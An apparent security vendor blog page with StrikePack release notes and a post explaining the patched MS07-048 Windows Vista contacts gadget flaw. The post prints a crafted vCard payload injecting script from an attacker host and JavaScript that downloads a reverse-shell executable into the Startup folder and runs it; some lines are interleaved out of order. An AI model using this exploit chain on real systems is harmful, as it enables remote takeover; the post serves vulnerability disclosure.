StrikePack 13868 Released
StrikePack 13868 is now available to BreakingPoint customers. This release contains nine new strikes covering three different vulnerabilities.
Vista Gadget Patches in MS07-048
Among the items patched in August by Microsoft were bugs in several Sidebar Gadgets included as part of Windows Vista. The advisory lists the RSS, contact, and weather gadgets as vulnerable to remote code execution.
Windows Vista Gadgets are described by Microsoft as "mini applications." This is somewhat of a misnomer. At their simplest, they are locally-hosted web applications that bundle all HTML, javascript, and other resources in a directory. As such, the application that hosts gadgets is actually IE7, or to use the description of Microsoft, gadgets "[use] the functionality of the Microsoft HTML (MSHTML) runtime, [and] are not limited by the standard browser security model."
Removing the standard browser security model means that gadgets have the ability to make calls to any code available locally or remotely. Local Active X controls, shell commands, and executables may be executed by a gadget. As will also be demonstrated, remotely-hosted executables can be downloaded to the machine and subsequently run.
The nature of the vulnerability in the contacts gadget is cross-site scripting in any of the phone number fields for a contact. Importing a specially-crafted contact file, and then viewing the contact in the gadget will result in code execution. This concept was to be one of the points in a talk at Defcon by Aviv Raff. A video demonstration of the attack has been made public. Since the bug is patched, we thought we'd show just how this attack works.
In the folder for the contact gadget is the file contact.html. The vulnerable version contains the following line of code, which inserts each of the phone numbers for the contact into the gadget HTML view:
newCell.innerHTML = "<span class='phone' title='" +Each of the phone number fields is being placed into an <SPAN> tag with no filtering; this is as basic a cross-site scripting vulnerability as you can get.
phoneNumber+"'></span>";
First, you must convince your victim to add your vcard. An example card is shown below, with long lines broken by backslash:
BEGIN:VCARDOne thing to point out here is that the embedded spaces between the telephone number and the embedded HTML style attribute will hide the attack when viewed in the contact manager in Windows Vista. Up to 3 embedded lines of javascript could be included in the contact file, as the home, work, and mobile phone numbers are all open to the same attack. Luckily, one injected javascript file will do the trick.
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:(512) 555 - 1212\
' \
style='c:expression(document.all[document.all.length-1]\
.src="http://myevilhackerspace.com/adodb.js")
END:VCARD
The embedded style tag evaluates a line of javascript which causes IE7 to download the javascript. This is done abusing the <SCRIPT> tag embedded in the gadget's HTML interface. In the vulerable file, the <SCRIPT> tag is the last tag in the file, located just before the close of the <HTML> tag.
When the gadget makes the request for the javascript file, the user agent is IE7, and the referer URL is empty. When XMLHttpRequest makes the request for the executable, it has a mildly interesting referer url of x-gadget:///contacts.html
The following javascript code is downloaded and run by the gadget:
var url="http://myevilhackerspace.com/reverse9999.exe";The injected javascript specifies a remotely-hosted executable file to be downloaded, which in this case is a reverse-connect shell that will connect to the attacker on TCP port 9999. It then specifies a location to save the file, using the Windows environment variables to place it in the user's startup folder. The file is downloaded using the XMLHttpRequest object, passing the resulting bytes to the ADODB.Stream Active X control to save to disk. Once the file is saved, it is executed, and the attacker now has a remote shell on the Vista box.
var path=System.Environment.\
getEnvironmentVariable("APPDATA") +
"\\Microsoft\\Windows\\Start Menu" +
"\\Programs\\StartUp\\reverse9999.exe";
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.send();
var a = new ActiveXObject("ADODB.Stream");
a.Type = 1;
a.Open();
a.Write(x.responseBody);
a.SaveToFile(path, 2);
a.Close;
a = null;
System.Shell.execute(path);
Strikes covering MS07-048 are included in BreakingPoint Systems StrikePack Update 13566, which was released on Fri August 17, 2007.
StrikePack 13566 Released
This StrikePack adds fifteen strikes covering nine new vulnerabilities. This update includes coverage for the patches released by Microsoft on August 14th, the recent Firefox URI handler issues, a buffer overflow in the SAP Message Server, a denial of service flaw in Windows Media when processing AU files, and a processing bug in the tcpdump network monitor application.
Vegas Redux: Black Hat / Defcon Materials
The materials from my Black Hat and Defcon presentations are now available online. If you were not able to attend the talks, the Tactical Exploitation whitepaper is a good place to start. The Black Hat presentation was much more detailed than the Defcon version, due to the longer time slot.
StrikePack 13343 Released
StrikePack 13343 is now available to BreakingPoint customers. This release contains ten new strikes covering four different vulnerabilities.
StrikePack 13086 Released
StrikePack 13086 is now available to BreakingPoint customers. This release contains 7 new strikes covering 6 different vulnerabilities.